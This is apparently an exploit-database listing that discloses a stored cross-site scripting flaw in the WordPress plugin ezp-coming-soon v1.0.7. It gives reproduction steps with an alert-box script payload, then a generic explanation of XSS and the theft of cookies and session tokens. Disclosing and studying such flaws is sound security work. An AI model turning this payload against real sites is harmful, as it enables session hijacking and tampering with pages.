Share
## https://sploitus.com/exploit?id=1337DAY-ID-33745
# # # # # 
# Exploit Title: WordPress Plugin ezp-coming-soon v1.0.7 -Cross-site Scripting (XSS)
# Vendor Homepage: https://snapcreek.com/ezp-coming-soon/
# Software: https://wordpress.org/plugins/easy-pie-coming-soon/
# Version: 1.0.7
# Tested on: Win7 x32, 
# # # # # 
# Exploit Author: 41!kh4224rDz
# Author Mail : [email protected]
# https://youtu.be/vCauzgP32dg

Install  ezp-coming-soon v1.0.7
Click  Tamplate 
http://localhost/zaza/wp-admin/admin.php?page=easy-pie-coming-soon
Click Text
write in Description or 	Text	 <script>alert("TEST");</script>

Overview
Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it.

An attacker can use XSS to send a malicious script to an unsuspecting user. The end user’s browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site. These scripts can even rewrite the content of the HTML page. For more details on the different types of XSS flaws, see: Types of Cross-Site Scripting.

#  0day.today [2020-01-19]  #